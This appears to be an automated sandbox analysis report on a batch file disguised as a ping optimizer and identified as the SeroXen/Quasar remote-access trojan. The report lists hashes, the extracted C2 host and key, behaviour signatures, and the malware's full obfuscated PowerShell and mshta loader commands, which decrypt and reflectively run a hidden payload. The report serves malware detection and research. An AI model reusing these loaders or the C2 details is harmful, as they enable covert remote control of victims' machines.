Analysis
-
max time kernel
61s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
09-01-2024 11:03
Static task
static1
Behavioral task
behavioral1
Sample
PingOptimizerMain.bat
Resource
win7-20231215-en
General
-
Target
PingOptimizerMain.bat
-
Size
11.7MB
-
MD5
ffc97bdf56ecbee34e263c88f330a9fd
-
SHA1
7f83beb8534cdc3f3ee2147e74d6f698812f2859
-
SHA256
d63b1658179ccc4b45c7f9726b83e32763850a046480b76a8f8920c709309b3e
-
SHA512
09a9dbf6d13297a89ea4d1dbe56ae8f4485ecb832b8fe4cf302d805aa1077ed496e1e84024014ad2238b937fd09c21067112bf52aec373deaf4c20df51ae85c1
-
SSDEEP
49152:zA8wtTTWxiw/n2WZfp8Nuw3PdwARNLfKu5LTEgwJt/eYr8ZLYY3GU80pJzgN5Vsi:X
Malware Config
Extracted
quasar
1.0.0.0
v3.0.6 | SeroXen
amazon-nr.gl.at.ply.gg:56754
a84ac298-1532-4b9d-a759-74f70b16a4b6
-
encryption_key
F28222E368B70A89947BE773CD2BA6F55AF0A35F
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/568-66-0x0000023358040000-0x00000233587A0000-memory.dmp family_quasar -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/568-66-0x0000023358040000-0x00000233587A0000-memory.dmp asyncrat -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Deletes itself 1 IoCs
pid Process 1140 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3940 $sxr-mshta.exe 2344 $sxr-cmd.exe 568 $sxr-powershell.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe File created C:\Windows\$sxr-powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 568 $sxr-powershell.exe 568 $sxr-powershell.exe 568 $sxr-powershell.exe 568 $sxr-powershell.exe 568 $sxr-powershell.exe 568 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 568 $sxr-powershell.exe Token: SeDebugPrivilege 568 $sxr-powershell.exe Token: SeDebugPrivilege 568 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 5116 wrote to memory of 640 5116 cmd.exe 92 PID 5116 wrote to memory of 640 5116 cmd.exe 92 PID 5116 wrote to memory of 1140 5116 cmd.exe 91 PID 5116 wrote to memory of 1140 5116 cmd.exe 91 PID 3940 wrote to memory of 2344 3940 $sxr-mshta.exe 102 PID 3940 wrote to memory of 2344 3940 $sxr-mshta.exe 102 PID 2344 wrote to memory of 2912 2344 $sxr-cmd.exe 104 PID 2344 wrote to memory of 2912 2344 $sxr-cmd.exe 104 PID 2344 wrote to memory of 568 2344 $sxr-cmd.exe 105 PID 2344 wrote to memory of 568 2344 $sxr-cmd.exe 105 PID 568 wrote to memory of 604 568 $sxr-powershell.exe 3 PID 568 wrote to memory of 688 568 $sxr-powershell.exe 1 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:604
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden2⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "2⤵PID:640
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-DlMgztMMqWzEVacEgNiQ4312:gNDjzNZM=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-DlMgztMMqWzEVacEgNiQ4312:gNDjzNZM=%2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function Rluao($GATpr){ $zbUvP=[System.Security.Cryptography.Aes]::Create(); $zbUvP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zbUvP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zbUvP.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('Jvne7EqTDjJUxdhZ6WfQ6qFa+P92IqL9Im6fxubmiPg='); $zbUvP.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('t5Jzj2fl8QhbaUyRkJ3dow=='); $Bwqdi=$zbUvP.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $fRUkc=$Bwqdi.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($GATpr, 0, $GATpr.Length); $Bwqdi.Dispose(); $zbUvP.Dispose(); $fRUkc;}function PSYYc($GATpr){ $YXOVu=New-Object System.IO.MemoryStream(,$GATpr); $UjuqW=New-Object System.IO.MemoryStream; Invoke-Expression '$cPoob @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$YXOVu,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $cPoob.CopyTo($UjuqW); $cPoob.Dispose(); $YXOVu.Dispose(); $UjuqW.Dispose(); $UjuqW.ToArray();}function PkOpP($GATpr){ $fRUkc = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($GATpr); $fRUkc = Rluao($fRUkc); $fRUkc = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($fRUkc); return $fRUkc;}function execute_function($GATpr,$ZpOdX){ $dXLTQ = @( '$EQTGj = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$GATpr);'.Replace('@', ''), '$zuJZD = $EQTGj.EntryPoint;', '$zuJZD.Invoke($null, $ZpOdX);' ); foreach ($htxYm in $dXLTQ) { Invoke-Expression $htxYm };}$OGwkk = PkOpP('Ddsfg+DubgptLKxYJOWSvg==');$pvzVw = PkOpP('qVKL5Ug8qrvHnpSvoJDFLWeq6BH6Nv5pdzoKtiMQD+s=');$SDKFb = PkOpP('WFuvx/6oMAg1+9D4fqqi6A==');$IVatZ = PkOpP('rkmtA5yUVqXZUFWW8Vi8kg==');if (@(get-process -ea silentlycontinue $IVatZ).count -gt 1) {exit};$YuMaQ = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($OGwkk).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pvzVw);$ZVkMP=PSYYc (Rluao ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($YuMaQ)));execute_function $ZVkMP (,[string[]] ($SDKFb)); "3⤵PID:2912
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b